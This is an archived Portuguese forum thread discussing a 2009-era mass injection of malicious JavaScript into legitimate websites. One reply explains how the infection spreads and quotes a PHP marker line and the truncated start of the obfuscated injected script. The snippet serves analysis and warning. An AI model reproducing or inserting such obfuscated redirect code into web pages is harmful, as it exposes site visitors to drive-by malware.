Ir para conteúdo

POWERED BY:

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

Patrique

Invasão em massa atinge mais de 20 mil sites legitimos

Por , em Geral

Recommended Posts

Patrique    0

Patrique
Postado

Invasão em massa atinge mais de 20 mil sites legitimos

 

Uma grande quantidade de sites legítimos, em todo o mundo, está sendo alvo de ataques virtuais, alertou nesta sexta-feira, 05/06, a empresa Websense, especializada em segurança da Informação.

 

Os cibercriminosos injetam códigos JavaScript maliciosos para remeter os internautas a páginas infectadas com malware. Mais de 20 mil sites já teriam sido afetados pelo golpe, de acordo com a empresa.

 

“O ataque não parece relacionado ao Gumblar. O local da injeção, bem como o próprio código, indicam uma nova campanha de invasão massiva independente”, advertiu a Websense, por meio de um comunicado.

 

Após a invasão bem-sucedida, um arquivo malicioso com baixa taxa de detecção pelos antivírus é executado no computador infectado.

 

Fonte: convergenciadigital

Compartilhar este post

Link para o post
Compartilhar em outros sites

Mário Monteiro    179

Mário Monteiro
Postado

isso é bem perigoso e preocupante

Compartilhar este post

Link para o post
Compartilhar em outros sites

hinom    5

hinom
Postado

Teoricamente nao houve invasão nenhuma.

 

Todos os esses sites foram infectados porque o programador/webmaster já possuía o virus no pc, geralmente por ter executado algum crack, ou software malicioso mesmo sabendo dos riscos.

 

O virus consiste em adicionar um script javascript codificado, em todos os arquivos que contenham a palavra "default" ou "index" na nomenclatura do nome.

Ao enviar arquivos do site pelo FTP, os scripts do virus eram enviados junto.

 

É um truque muito antigo e muitos ainda caem nisso.

O ponto chave em questão foi falha de quem administra o site em não cuidar do próprio PC.

A maioria dos que lidam com programação de sites são inexperientes e leigos em diversos assuntos, por isso, é fácil disseminar esse tipo de "ataque".

 

O script javascript abre um iframe que aponta para um desses sites ".ru" hospedados em locais onde não existem leis de internet.

No redirecionamento, é forçado o download de um trojan, que explora vulnerabilidades de browsers desatualizados.

 

php

if(!function_exists('tmp_lkojfghx'))

javascript

<script language=javascript><!-- (function(){var XcG4='v&61r&20a&3d&22&53cr&69ptEn&67i&6e&65&22&2cb&3d&22V&65rsion()+&22&2c&6a&3d&22&22&2cu&3dnav&69&67&61to&72&2euserAgent&3b&69f((&75&2e&69n&64exOf(&22&43hrome&22)&3c0)&26&26(u&2eindexOf&28&22W&69&6e&22)&3e0)&26&26&28u&2einde&78Of(&22&4e&54&206&22)&3c0)&26&26(&64ocum&65n&74&2ecooki&65&2eindex&4f&66

Compartilhar este post

Link para o post
Compartilhar em outros sites

hgb7    3

hgb7
Postado

O Site que eu cuido foi infectado por este default aí, mas apaguei os arquivos já... mas meu PC não tinha nenhum vestigio de malwares...

Compartilhar este post

Link para o post
Compartilhar em outros sites

hinom    5

hinom
Postado

pode não ter sido essse em específico, pois desse tipo de virus existem milhares.

cada um com sua característica

Compartilhar este post

Link para o post
Compartilhar em outros sites
Ir para a lista de tópicos Geral
×

Informação importante

Ao usar o fórum, você concorda com nossos Termos e condições.

  Aceito